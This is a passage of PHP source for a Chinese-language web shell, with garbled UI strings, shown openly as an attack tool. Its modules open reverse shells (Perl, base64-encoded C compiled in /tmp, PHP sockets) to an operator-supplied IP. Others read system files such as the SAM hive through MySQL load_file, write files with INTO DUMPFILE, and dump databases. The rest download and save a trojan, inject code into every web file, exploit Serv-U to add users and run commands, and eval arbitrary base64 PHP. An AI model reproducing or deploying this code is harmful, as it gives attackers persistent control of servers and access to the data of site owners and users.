\';\r\n\t\t\t$perlpath = Exec_Run(\'which perl\');\r\n\t\t\t$perlpath = $perlpath ? chop($perlpath) : \'perl\';\r\n\t\t\t@unlink(\'/tmp/envl_bc.c\');\r\n\t\t\techo Exec_Run($perlpath.\' /tmp/envl_bc \'.$_POST[\'yourip\'].\' \'.$_POST[\'yourport\'].\' &\') ? \'nc -vv -l \'.$_POST[\'yourport\'] : \'ִʧ\';\r\n\t\t}\r\n\t\tif($_POST[\'use\'] == \'c\')\r\n\t\t{\r\n\t\t\t$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".\r\n\t\t\t"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".\r\n\t\t\t"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".\r\n\t\t\t"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".\r\n\t\t\t"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".\r\n\t\t\t"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".\r\n\t\t\t"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".\r\n\t\t\t"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";\r\n\t\t\techo File_Write(\'/tmp/envl_bc.c\',base64_decode($back_connect_c),\'wb\') ? \'/tmp/envl_bc.cɹ
\' : \'/tmp/envl_bc.cʧ
\';\r\n\t\t\t$res = Exec_Run(\'gcc -o /tmp/envl_bc /tmp/envl_bc.c\');\r\n\t\t\t@unlink(\'/tmp/envl_bc.c\');\r\n\t\t\techo Exec_Run(\'/tmp/envl_bc \'.$_POST[\'yourip\'].\' \'.$_POST[\'yourport\'].\' &\') ? \'nc -vv -l \'.$_POST[\'yourport\'] : \'ִʧ\';\r\n\t\t}\r\n\t\tif($_POST[\'use\'] == \'php\')\r\n\t\t{\r\n\t\tif(!extension_loaded(\'sockets\'))\r\n {\r\n\t if ($system == \'WIN\') {\r\n\t\t @dl(\'php_sockets.dll\') or die("Can\'t load socket");\r\n\t }else{\r\n\t \t @dl(\'sockets.so\') or die("Can\'t load socket");\r\n\t }\r\n }\r\n\t\t if($system=="WIN")\r\n {\r\n \t$env=array(\'path\' => \'c:\\\\windows\\\\system32\');\r\n }else{\r\n\t $env = array(\'PATH\' => \'/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin\');\r\n }\r\n $descriptorspec = array(\r\n \t0 => array("pipe","r"),\r\n\t 1 => array("pipe","w"),\r\n\t 2 => array("pipe","w"),\r\n );\r\n\t\t $host = $_POST[\'yourip\'];\r\n \t $port = $_POST[\'yourport\'];\r\n $host=gethostbyname($host);\r\n $proto=getprotobyname("tcp");\r\n if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){\r\n die("Socketʧ");\r\n }\r\n if(($ret=socket_connect($sock,$host,$port))<0){\r\n die("ʧ");\r\n }else{\r\n $message="----------------------PHP--------------------\\n";\r\n socket_write($sock,$message,strlen($message));\r\n $cwd=str_replace(\'\\\\\',\'/\',dirname(__FILE__));\r\n while($cmd=socket_read($sock,65535,$proto)){\r\n if(trim(strtolower($cmd))=="exit"){\r\n socket_write($sock,"Bye\\n");\r\n exit;\r\n }else{\r\n $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);\r\n if (is_resource($process)) {\r\n\t fwrite($pipes[0], $cmd);\r\n\t fclose($pipes[0]);\r\n\t $msg=stream_get_contents($pipes[1]);\r\n\t socket_write($sock,$msg,strlen($msg));\r\n\t fclose($pipes[1]);\r\n\t $msg=stream_get_contents($pipes[2]);\r\n\t socket_write($sock,$msg,strlen($msg));\r\n\t $return_value = proc_close($process);\r\n }\r\n }\r\n\t\t }\r\n\t\t }\r\n\t\t}\r\n\t\tif($_POST[\'use\'] == \'nc\')\r\n\t\t{\r\n\t echo \'
\';\r\n\t\t $mip=$_POST[\'yourip\'];\r\n\t\t $bport=$_POST[\'yourport\'];\r\n\t\t $fp=fsockopen($mip , $bport , $errno, $errstr);\r\n\t\t if (!$fp){\r\n\t\t $result = "Error: could not open socket connection";\r\n\t\t }else {\r\n\t\t fputs ($fp ,"\\n*********************************************\\n \r\n\t\t hacking url:http://www.caidaome.com is ok! \r\n\t\t\t \\n*********************************************\\n\\n");\r\n\t while(!feof($fp)){ \r\n fputs ($fp," [r00t@H4c3ing:/root]# ");\r\n $result= fgets ($fp, 4096);\r\n $message=`$result`;\r\n fputs ($fp,"--> ".$message."\\n");\r\n }\r\n fclose ($fp);\r\n\t\t }\r\n echo \'
\';\r\n\t\t}\r\n\r\n\t\techo \'
ԳӶ˿ (nc -vv -l \'.$_POST[\'yourport\'].\') \';\r\n\t}\r\nbreak;\r\n\r\n\tcase "sqlshell":\r\n\t$MSG_BOX = \'\';\r\n\t$mhost = \'localhost\'; $muser = \'root\'; $mport = \'3306\'; $mpass = \'\'; $mdata = \'mysql\'; $msql = \'select version();\';\r\n\tif(isset($_POST[\'mhost\']) && isset($_POST[\'muser\']))\r\n\t{\r\n\t\t$mhost = $_POST[\'mhost\']; $muser = $_POST[\'muser\']; $mpass = $_POST[\'mpass\']; $mdata = $_POST[\'mdata\']; $mport = $_POST[\'mport\'];\r\n\t\tif($conn = mysql_connect($mhost.\':\'.$mport,$muser,$mpass)) @mysql_select_db($mdata);\r\n\t\telse $MSG_BOX = \'MYSQLʧ\';\r\n\t}\r\n\t$downfile = \'c:/windows/repair/sam\';\r\n\tif(!empty($_POST[\'downfile\']))\r\n\t{\r\n\t\t$downfile = File_Str($_POST[\'downfile\']);\r\n\t\t$binpath = bin2hex($downfile);\r\n\t\t$query = \'select load_file(0x\'.$binpath.\')\';\r\n\t\tif($result = @mysql_query($query,$conn))\r\n\t\t{\r\n\t\t\t$k = 0; $downcode = \'\';\r\n\t\t\twhile($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;}\r\n\t\t\t$filedown = basename($downfile);\r\n\t\t\tif(!$filedown) $filedown = \'envl.tmp\';\r\n\t\t\t$array = explode(\'.\', $filedown);\r\n\t\t\t$arrayend = array_pop($array);\r\n\t\t\theader(\'Content-type: application/x-\'.$arrayend);\r\n\t\t\theader(\'Content-Disposition: attachment; filename=\'.$filedown);\r\n\t\t\theader(\'Content-Length: \'.strlen($downcode));\r\n\t\t\techo $downcode;\r\n\t\t\texit;\r\n\t\t}\r\n\t\telse $MSG_BOX = \'ļʧ\';\r\n\t}\r\n\t$o = isset($_GET[\'o\']) ? $_GET[\'o\'] : \'\';\r\nprint<<\r\n
[MYSQLִ] \r\n[MYSQLϴļ] \r\n[MYSQLļ]\r\n[MYSQLѿ㱸]
\r\n
\r\nַ \r\n˿ \r\nû \r\n \r\n \r\n
\r\n
\r\nEND;\r\nif($o == \'u\')\r\n{\r\n\t$uppath = \'C:/Documents and Settings/All Users/ʼ˵///exp.vbs\';\r\n\tif(!empty($_POST[\'uppath\']))\r\n\t{\r\n\t\t$uppath = $_POST[\'uppath\'];\r\n\t\t$query = \'Create TABLE a (cmd text NOT NULL);\';\r\n\t\tif(@mysql_query($query,$conn))\r\n\t\t{\r\n\t\t\tif($tmpcode = File_Read($_FILES[\'upfile\'][\'tmp_name\'])){$filecode = bin2hex(File_Read($tmpcode));}\r\n\t\t\telse{$tmp = File_Str(dirname(myaddress)).\'/upfile.tmp\';if(File_Up($_FILES[\'upfile\'][\'tmp_name\'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}}\r\n\t\t\t$query = \'Insert INTO a (cmd) VALUES(CONVERT(0x\'.$filecode.\',CHAR));\';\r\n\t\t\tif(@mysql_query($query,$conn))\r\n\t\t\t{\r\n\t\t\t\t$query = \'SELECT cmd FROM a INTO DUMPFILE \\\'\'.$uppath.\'\\\';\';\r\n\t\t\t\t$MSG_BOX = @mysql_query($query,$conn) ? \'ϴļɹ\' : \'ϴļʧ\';\r\n\t\t\t}\r\n\t\t\telse $MSG_BOX = \'ʱʧ\';\r\n\t\t\t@mysql_query(\'Drop TABLE IF EXISTS a;\',$conn);\r\n\t\t}\r\n\t\telse $MSG_BOX = \'ʱʧ\';\r\n\t}\r\nprint<<
ϴ· \r\n

ѡļ \r\n
\r\nEND;\r\n}elseif($o==\'tk\'){\r\nif($_POST[\'dump\']==\'dump\'){\r\n$mysql_link=@mysql_connect($mhost,$muser,$mpass);\r\nmysql_select_db($mdata);\r\nmysql_query("SET NAMES gbk");\r\n$mysql="";\r\n$q1=mysql_query("show tables");\r\nwhile($t=mysql_fetch_array($q1)){\r\n$table=$t[0];\r\n$q2=mysql_query("show create table `$table`");\r\n$sql=mysql_fetch_array($q2);\r\n$mysql.=$sql[\'Create Table\'].";\\r\\n\\r\\n";\r\n$q3=mysql_query("select * from `$table`");\r\nwhile($data=mysql_fetch_assoc($q3))\r\n{\r\n$keys=array_keys($data);\r\n$keys=array_map(\'addslashes\',$keys);\r\n$keys=join(\'`,`\',$keys);\r\n$keys="`".$keys."`";\r\n$vals=array_values($data);\r\n$vals=array_map(\'addslashes\',$vals);\r\n$vals=join("\',\'",$vals);\r\n$vals="\'".$vals."\'";\r\n$mysql.="insert into `$table`($keys) values($vals);\\r\\n";\r\n}\r\n$mysql.="\\r\\n";\r\n}\r\n$filename=date("Y-m-d-GisA").".sql";\r\n$fp=fopen($filename,\'w\');\r\nfputs($fp,$mysql);\r\nfclose($fp);\r\n$tip="
ݱݳɹݿļ[".$filename."]
";\r\n}else{$tip="δݣ֤Ŀ¼д";}\r\nprint<<

\r\nñܣݿɷ崻 :-(

\r\n{$tip}

\r\n\r\n\r\n
\r\nEND;\r\n}\r\nelseif($o == \'d\')\r\n{\r\nprint<<

ļ \r\n
\r\nEND;\r\n}\r\nelse\r\n{\r\n\tif(!empty($_POST[\'msql\']))\r\n\t{\r\n\t\t$msql = $_POST[\'msql\'];\r\n\t\tif($result = @mysql_query($msql,$conn))\r\n\t\t{\r\n\t\t\t$MSG_BOX = \'ִSQLɹ
\';\r\n\t\t\t$k = 0;\r\n\t\t\twhile($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}\r\n\t\t}\r\n\t\telse $MSG_BOX .= mysql_error();\r\n\t}\r\nprint<<\r\nfunction nFull(i){\r\n\tStr = new Array(11);\r\n\tStr[0] = "select version();";\r\n\tStr[1] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile \'D:/web/iis.txt\'";\r\n\tStr[2] = "select \'\' into outfile \'F:/web/bak.php\';";\r\n\tStr[3] = "GRANT ALL PRIVILEGES ON *.* TO \'root\'@\'%\' IDENTIFIED BY \'123456\' WITH GRANT OPTION;";\r\n\tStr[4] = "select @@plugin_dir";\r\n\tStr[5] = "select \'xxx\' into dumpfile \'C:\\\\\\\\\\\\\\\\MySQL\\\\\\\\\\\\\\\\lib::\\$INDEX_ALLOCATION\';";\r\n\tStr[6] = "select \'xxx\' into dumpfile \'C:\\\\\\\\\\\\\\\\MySQL\\\\\\\\\\\\\\\\lib\\\\\\\\\\\\\\\\plugin::\\$INDEX_ALLOCATION\';";\r\n\tnform.msql.value = Str[i];\r\n\treturn true;\r\n}\r\n\r\n
\r\n
\r\n\r\n\r\nEND;\r\n}\r\n\tif($MSG_BOX != \'\') echo \'
\'.$MSG_BOX.\'
\';\r\n\telse echo \'
\';\r\n\tbreak;\r\n\t\r\n case "downloader":\r\n\t$Com_durl = isset($_POST[\'durl\']) ? $_POST[\'durl\'] : \'http://www.baidu.com/down/muma.exe\';\r\n\t$Com_dpath= isset($_POST[\'dpath\']) ? $_POST[\'dpath\'] : File_Str(dirname(myaddress).\'/muma.exe\');\r\nprint<<\r\n
\r\n
ص
\r\n
\r\nEND;\r\n\tif((!empty($_POST[\'durl\'])) && (!empty($_POST[\'dpath\'])))\r\n\t{\r\n\t\techo \'
\';\r\n\t\t$contents = @file_get_contents($_POST[\'durl\']);\r\n\t\tif(!$contents) echo \'޷ȡҪص\';\r\n\t\telse echo File_Write($_POST[\'dpath\'],$contents,\'wb\') ? \'ļɹ\' : \'ļʧ\';\r\n\t\techo \'
\';\r\n\t}\r\n\tbreak;\r\n\r\n\tcase "issql":\r\n\tsession_start();\r\n if($_POST[\'sqluser\'] && $_POST[\'sqlpass\']){\r\n $_SESSION[\'sql_user\'] = $_POST[\'sqluser\'];\r\n $_SESSION[\'sql_password\'] = $_POST[\'sqlpass\'];\r\n }\r\n if($_POST[\'sqlhost\']){$_SESSION[\'sql_host\'] = $_POST[\'sqlhost\'];}\r\n else{$_SESSION[\'sql_host\'] = \'localhost\';}\r\n if($_POST[\'sqlport\']){$_SESSION[\'sql_port\'] = $_POST[\'sqlport\'];}\r\n else{$_SESSION[\'sql_port\'] = \'3306\';}\r\n if($_SESSION[\'sql_user\'] && $_SESSION[\'sql_password\']){\r\n if(!($sqlcon = @mysql_connect($_SESSION[\'sql_host\'].\':\'.$_SESSION[\'sql_port\'],$_SESSION[\'sql_user\'],$_SESSION[\'sql_password\']))){\r\n unset($_SESSION[\'sql_user\'], $_SESSION[\'sql_password\'], $_SESSION[\'sql_host\'], $_SESSION[\'sql_port\']);\r\n die(html_a(\'?eanver=sqlshell\',\'ʧ뷵\'));\r\n }\r\n }\r\n else{\r\n die(html_a(\'?eanver=sqlshell\',\'ʧ뷵\'));\r\n }\r\n $query = mysql_query("SHOW DATABASES",$sqlcon);\r\n html_n(\'ݿб:\');\r\n while($db = mysql_fetch_array($query)) {\r\n\t\thtml_a(\'?eanver=issql&db=\'.$db[\'Database\'],$db[\'Database\']);\r\n\t\techo \'  \';\r\n\t}\r\n html_n(\'\');\r\n if($_GET[\'db\']){\r\n \tcss_js("3");\r\n mysql_select_db($_GET[\'db\'], $sqlcon);\r\n html_n(\'

\');\r\n html_select(array(0=>"--SQL﷨--",7=>"",8=>"ɾ",9=>"޸",10=>"ݱ",11=>"ɾݱ",12=>"ֶ",13=>"ɾֶ"),0,"onchange=\'return Full(options[selectedIndex].value)\'");\r\n html_input("submit","doquery","ִ");\r\n html_a("?eanver=issql&db=".$_GET[\'db\'],$_GET[\'db\']);\r\n html_n(\'--->\');\r\n html_a("?eanver=issql&db=".$_GET[\'db\']."&table=".$_GET[\'table\'],$_GET[\'table\']);\r\n html_n(\'

\');\r\n \tif(!empty($_POST[\'sql\'])){\r\n\t\t\tif (@mysql_query($_POST[\'sql\'],$sqlcon)) {\r\n\t\t\t\techo "ִSQLɹ";\r\n\t\t\t}else{\r\n\t\t\t\techo ": ".mysql_error();\r\n\t\t\t}\r\n \t}\r\n if($_GET[\'table\']){\r\n html_n(\'\');\r\n $query = "SHOW COLUMNS FROM ".$_GET[\'table\'];\r\n $result = mysql_query($query,$sqlcon);\r\n $fields = array();\r\n while($row = mysql_fetch_assoc($result)){\r\n array_push($fields,$row[\'Field\']);\r\n html_n(\'\');\r\n }\r\n html_n(\'\');\r\n $result = mysql_query("SELECT * FROM ".$_GET[\'table\'],$sqlcon) or die(mysql_error());\r\n while($text = @mysql_fetch_assoc($result)){\r\n \tforeach($fields as $row){\r\n \t\tif($text[$row] == "") $text[$row] = \'NULL\';\r\n \t\thtml_n(\'\');\r\n \t}\r\n \techo \'\';\r\n }\r\n }\r\n else{\r\n $query = "SHOW TABLES FROM " . $_GET[\'db\'];\r\n $dat = mysql_query($query, $sqlcon) or die(mysql_error());\r\n while ($row = mysql_fetch_row($dat)){\r\n html_n("");\r\n }\r\n }\r\n }\r\n\tbreak;\r\n\t\r\n\tcase "upfiles":\r\n\thtml_n(\'\');\r\n\tif(!empty($_POST[\'path\'])){\r\n\t\thtml_n(\'\');\r\n\tif(!empty($_POST[\'path\'])){\r\n\t\thtml_n(\'\');\r\n\tif(!empty($_POST[\'path\'])){\r\n\t\thtml_n(\'\');\r\n\tif(!empty($_POST[\'path\'])){\r\n\t\thtml_n(\'\r\n\t\r\n \r\n \r\n\t\r\n \r\n \r\n\t\r\n \r\n \r\n\t\r\n \r\n
\'.$row[\'Field\'].\'
\'.$text[$row].\'
".$row[0]."
ϴļС: \'.@get_cfg_var(\'upload_max_filesize\').\'
\');\r\n\thtml_input("text","uppath",root_dir,"
ϴ·: ","51");\r\nprint<<\r\nfunction addTank(){\r\nvar k=0;\r\n k=k+1;\r\n k=tank.rows.length;\r\n newRow=document.all.tank.insertRow(-1)\r\n \r\n newcell=newRow.insertCell()\r\n newcell.innerHTML=" "\r\n}\r\n\r\nfunction delTank() {\r\n if(tank.rows.length==1) return;\r\n var checkit = false;\r\n for (var i=0;i\r\n

\r\n \r\n \r\n \r\n \r\n
\r\n \r\n
\r\n\r\n\r\n\r\n
ѡҪϴļ
\r\nEND;\r\n\thtml_n(\'
\');\r\n\tif($_POST[\'upfiles\']){\r\n\t\tforeach ($_FILES["upfile"]["error"] as $key => $error){\r\n\t\t\tif ($error == UPLOAD_ERR_OK){\r\n\t\t\t\t$tmp_name = $_FILES["upfile"]["tmp_name"][$key];\r\n\t\t\t\t$name = $_FILES["upfile"]["name"][$key];\r\n\t\t\t\t$uploadfile = str_path($_POST[\'uppath\'].\'/\'.$name);\r\n\t\t\t\t$upload = @copy($tmp_name,$uploadfile) ? $name.$msg[2] : @move_uploaded_file($tmp_name,$uploadfile) ? $name.$msg[2] : $name.$msg[3];\r\n\t\t\t\techo \'

\'.$upload;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\thtml_n(\'\');\r\n\tbreak;\r\n\t\r\n\tcase "guama":\r\n\t$patht = isset($_POST[\'path\']) ? $_POST[\'path\'] : root_dir;\r\n\t$typet = isset($_POST[\'type\']) ? $_POST[\'type\'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx";\r\n\t$codet = isset($_POST[\'code\']) ? $_POST[\'code\'] : "";\r\n\thtml_n(\'
ļ"|",Ҳָļ.

\');\r\n\thtml_input("text","path",$patht,"·Χ","45");\r\n\thtml_input("checkbox","pass","","ʹĿ¼","",true);\r\n\thtml_input("text","type",$typet,"

ļ","60");\r\n\thtml_text("code","67","5",$codet);\r\n\thtml_n(\'

\');\r\n\thtml_radio("","","guama","qingma");\r\n\thtml_input("submit","passreturn","ʼ");\r\n\thtml_n(\'
Ŀļ:

\');\r\n\t\tif(isset($_POST[\'pass\'])) $bool = true; else $bool = false;\r\n\t\tdo_passreturn($patht,$codet,$_POST[\'return\'],$bool,$typet);\r\n\t}\r\n\tbreak;\r\n\t\r\n\tcase "tihuan":\r\n\thtml_n(\'
˹ܿ滻ļ,Сʹ.

\');\r\n\thtml_input("text","path",root_dir,"·Χ","45");\r\n\thtml_input("checkbox","pass","","ʹĿ¼","",true);\r\n\thtml_text("newcode","67","5",$_POST[\'newcode\']);\r\n\thtml_n(\'

滻Ϊ\');\r\n\thtml_text("oldcode","67","5",$_POST[\'oldcode\']);\r\n\thtml_input("submit","passreturn","滻","

");\r\n\thtml_n(\'
Ŀļ:

\');\r\n\t\tif(isset($_POST[\'pass\'])) $bool = true; else $bool = false;\r\n\t\tdo_passreturn($_POST[\'path\'],$_POST[\'newcode\'],"tihuan",$bool,$_POST[\'oldcode\']);\r\n\t}\r\n\tbreak;\r\n\t\r\n\tcase "scanfile":\r\n\tcss_js("4");\r\n\thtml_n(\'
˹ܿɺܷMYSQLûļ,Ȩ.
ļ̫ʱ,Ӱִٶ,ʹĿ¼.

\');\r\n\thtml_input("text","path",root_dir,"·","45");\r\n\thtml_input("checkbox","pass","","ʹĿ¼","",true);\r\n\thtml_input("text","code",$_POST[\'code\'],"

ؼ","40");\r\n\thtml_select(array("--MYSQLļ--","Discuz","PHPWind","phpcms","dedecms","PHPBB","wordpress","sa-blog","o-blog"),0,"onchange=\'return Fulll(options[selectedIndex].value)\'");\r\n\thtml_n(\'

\');\r\n\thtml_radio("ļ","","scanfile","scancode");\r\n\thtml_input("submit","passreturn","");\r\n\thtml_n(\'
ҵļ:

\');\r\n\t\tif(isset($_POST[\'pass\'])) $bool = true; else $bool = false;\r\n\t\tdo_passreturn($_POST[\'path\'],$_POST[\'code\'],$_POST[\'return\'],$bool);\r\n\t}\r\n\tbreak;\r\n\t\r\n\tcase "scanphp":\r\n\thtml_n(\'
ԭǸ붨,鿴жϺٽɾ.

\');\r\n\thtml_input("text","path",root_dir,"ҷΧ","40");\r\n\thtml_input("checkbox","pass","","ʹĿ¼

ű","",true);\r\n\thtml_select(array("php" => "PHP","asp" => "ASP","aspx" => "ASPX","jsp" => "JSP"));\r\n\thtml_input("submit","passreturn","","

");\r\n\thtml_n(\'
ҵļ:

\');\r\n\t\tif(isset($_POST[\'pass\'])) $bool = true; else $bool = false;\r\n\t\tdo_passreturn($_POST[\'path\'],$_POST[\'class\'],"scanphp",$bool);\r\n\t}\r\n\tbreak;\r\n\t\r\n\tcase "port":\r\n\t$Port_ip = isset($_POST[\'ip\']) ? $_POST[\'ip\'] : \'127.0.0.1\';\r\n\t$Port_port = isset($_POST[\'port\']) ? $_POST[\'port\'] : \'21|23|25|80|110|135|139|445|1433|3306|3389|43958|5631|2049|873\';\r\nprint<<\r\n
ɨIP
\r\n
˿ں
\r\n
\r\n\r\nEND;\r\n\tif((!empty($_POST[\'ip\'])) && (!empty($_POST[\'port\'])))\r\n\t{\r\n\t\techo \'
\';\r\n\t\t$ports = explode(\'|\', $_POST[\'port\']);\r\n\t\tfor($i = 0;$i < count($ports);$i++)\r\n\t\t{\r\n\t\t\t$fp = @fsockopen($_POST[\'ip\'],$ports[$i],$errno,$errstr,2);\r\n\t\t\techo $fp ? \'Ŷ˿ ---> \'.$ports[$i].\'
\' : \'رն˿ ---> \'.$ports[$i].\'
\';\r\n\t\t\tob_flush();\r\n\t\t\tflush();\r\n\t\t}\r\n\t\techo \'
\';\r\n\t}\r\n\tbreak;\r\n\t\r\n\r\n\tcase "getcode":\r\nif (isset($_POST[\'url\'])) {$proxycontents = @file_get_contents($_POST[\'url\']);echo ($proxycontents) ? $proxycontents : "

ȡ URL ʧ

";exit;}\r\nprint<<\r\n
\r\n
ߴ

  • ñܽʵּ򵥵 HTTP ,ʾʹ·ͼƬӼCSSʽ.
  • ñܿͨĿURL,֧ SQL Injection ̽ԼijЩַ.
  • ñ URL,ĿµIP¼ : {$_SERVER[\'SERVER_NAME\']}
URL: \r\n \r\n
\r\nEND;\r\n\tbreak;\r\n\t\r\n\tcase "servu":\r\n\t$SUPass = isset($_POST[\'SUPass\']) ? $_POST[\'SUPass\'] : \'#l@$ak#.lk;0@P\';\r\nprint<<[ִ] [û]\r\n
\r\n\t
ServU˿
\r\n\t
ServUû
\r\n\t
ServU
\r\nEND;\r\nif($_GET[\'o\'] == \'adduser\')\r\n{\r\nprint<<ʺ \r\n \r\nĿ¼ \r\nEND;\r\n}\r\nelse\r\n{\r\nprint<<Ȩ
\r\n\r\n\r\n\r\nEND;\r\n}\r\necho \'
\';\r\n\tif((!empty($_POST[\'SUPort\'])) && (!empty($_POST[\'SUUser\'])) && (!empty($_POST[\'SUPass\'])))\r\n\t{\r\n\t\techo \'
\';\r\n\t\t$sendbuf = "";\r\n\t\t$recvbuf = "";\r\n\t\t$domain = "-SETDOMAIN\\r\\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\\r\\n"."-TZOEnable=0\\r\\n"." TZOKey=\\r\\n";\r\n\t\t$adduser = "-SETUSERSETUP\\r\\n"."-IP=0.0.0.0\\r\\n"."-PortNo=21\\r\\n"."-User=".$_POST[\'user\']."\\r\\n"."-Password=".$_POST[\'password\']."\\r\\n"."-HomeDir=c:\\\\\\r\\n"."-LoginMesFile=\\r\\n"."-Disable=0\\r\\n"."-RelPaths=1\\r\\n"."-NeedSecure=0\\r\\n"."-HideHidden=0\\r\\n"."-AlwaysAllowLogin=0\\r\\n"."-ChangePassword=0\\r\\n".\r\n\t\t\t\t\t\t\t "-QuotaEnable=0\\r\\n"."-MaxUsersLoginPerIP=-1\\r\\n"."-SpeedLimitUp=0\\r\\n"."-SpeedLimitDown=0\\r\\n"."-MaxNrUsers=-1\\r\\n"."-IdleTimeOut=600\\r\\n"."-SessionTimeOut=-1\\r\\n"."-Expire=0\\r\\n"."-RatioUp=1\\r\\n"."-RatioDown=1\\r\\n"."-RatiosCredit=0\\r\\n"."-QuotaCurrent=0\\r\\n"."-QuotaMaximum=0\\r\\n".\r\n\t\t\t\t\t\t\t "-Maintenance=None\\r\\n"."-PasswordType=Regular\\r\\n"."-Ratios=None\\r\\n"." Access=".$_POST[\'part\']."\\|RWAMELCDP\\r\\n";\r\n\t\t$deldomain = "-DELETEDOMAIN\\r\\n"."-IP=0.0.0.0\\r\\n"." PortNo=21\\r\\n";\r\n\t\t$sock = @fsockopen("127.0.0.1", $_POST["SUPort"],$errno,$errstr, 10);\r\n\t\t$recvbuf = @fgets($sock, 1024);\r\n\t\techo "ݰ: $recvbuf
";\r\n\t\t$sendbuf = "USER ".$_POST["SUUser"]."\\r\\n";\r\n\t\t@fputs($sock, $sendbuf, strlen($sendbuf));\r\n\t\techo "ݰ: $sendbuf
";\r\n\t\t$recvbuf = @fgets($sock, 1024);\r\n\t\techo "ݰ: $recvbuf
";\r\n\t\t$sendbuf = "PASS ".$_POST["SUPass"]."\\r\\n";\r\n\t\t@fputs($sock, $sendbuf, strlen($sendbuf));\r\n\t\techo "ݰ: $sendbuf
";\r\n\t\t$recvbuf = @fgets($sock, 1024);\r\n\t\techo "ݰ: $recvbuf
";\r\n\t\t$sendbuf = "SITE MAINTENANCE\\r\\n";\r\n\t\t@fputs($sock, $sendbuf, strlen($sendbuf));\r\n\t\techo "ݰ: $sendbuf
";\r\n\t\t$recvbuf = @fgets($sock, 1024);\r\n\t\techo "ݰ: $recvbuf
";\r\n\t\t$sendbuf = $domain;\r\n\t\t@fputs($sock, $sendbuf, strlen($sendbuf));\r\n\t\techo "ݰ: $sendbuf
";\r\n\t\t$recvbuf = @fgets($sock, 1024);\r\n\t\techo "ݰ: $recvbuf
";\r\n\t\t$sendbuf = $adduser;\r\n\t\t@fputs($sock, $sendbuf, strlen($sendbuf));\r\n\t\techo "ݰ: $sendbuf
";\r\n\t\t$recvbuf = @fgets($sock, 1024);\r\n\t\techo "ݰ: $recvbuf
";\r\n\t\tif(!empty($_POST[\'SUCommand\']))\r\n\t\t{\r\n\t \t\t$exp = @fsockopen("127.0.0.1", "21",$errno,$errstr, 10);\r\n\t \t\t$recvbuf = @fgets($exp, 1024);\r\n\t \t\techo "ݰ: $recvbuf
";\r\n\t \t\t$sendbuf = "USER ".$_POST[\'user\']."\\r\\n";\r\n\t \t\t@fputs($exp, $sendbuf, strlen($sendbuf));\r\n\t \t\techo "ݰ: $sendbuf
";\r\n\t \t\t$recvbuf = @fgets($exp, 1024);\r\n\t \t\techo "ݰ: $recvbuf
";\r\n\t \t\t$sendbuf = "PASS ".$_POST[\'password\']."\\r\\n";\r\n\t \t\t@fputs($exp, $sendbuf, strlen($sendbuf));\r\n\t \t\techo "ݰ: $sendbuf
";\r\n\t \t\t$recvbuf = @fgets($exp, 1024);\r\n\t \t\techo "ݰ: $recvbuf
";\r\n\t \t\t$sendbuf = "site exec ".$_POST["SUCommand"]."\\r\\n";\r\n\t \t\t@fputs($exp, $sendbuf, strlen($sendbuf));\r\n\t \t\techo "ݰ: site exec ".$_POST["SUCommand"]."
";\r\n\t \t\t$recvbuf = @fgets($exp, 1024);\r\n\t \t\techo "ݰ: $recvbuf
";\r\n\t \t\t$sendbuf = $deldomain;\r\n\t \t\t@fputs($sock, $sendbuf, strlen($sendbuf));\r\n\t \t\techo "ݰ: $sendbuf
";\r\n\t \t\t$recvbuf = @fgets($sock, 1024);\r\n\t \t\techo "ݰ: $recvbuf
";\r\n\t \t\t@fclose($exp);\r\n\t\t}\r\n\t\t@fclose($sock);\r\n\t\techo \'
\';\r\n\t}\r\n\tbreak;\r\n\t\r\n\tcase "phpcode":\r\n\t$phpcode = isset($_POST[\'phpcode\']) ? $_POST[\'phpcode\'] : "phpinfo();";\r\n if($phpcode!=\'phpinfo();\')$phpcode = htmlspecialchars(base64_decode($phpcode));\r\n\techo \'
д<? ?>ǩ,˹ŻʹBASE64ֹܴͣ뱻˾֪ССϸڣעɾͣ



\';\r\n\tif(!empty($_POST[\'phpcode\'])){\r\n\techo "

";\r\n eval(stripslashes(base64_decode($_POST[\'phpcode\'])));\r\n\t}\r\n\thtml_n(\'
\');\r\n\tbreak;\r\n\r\n\r\n\tcase "myexp":\r\n\t$MSG_BOX = \'ȵDLL,ִ.MYSQLûΪrootȨ,·ܼDLLļ.
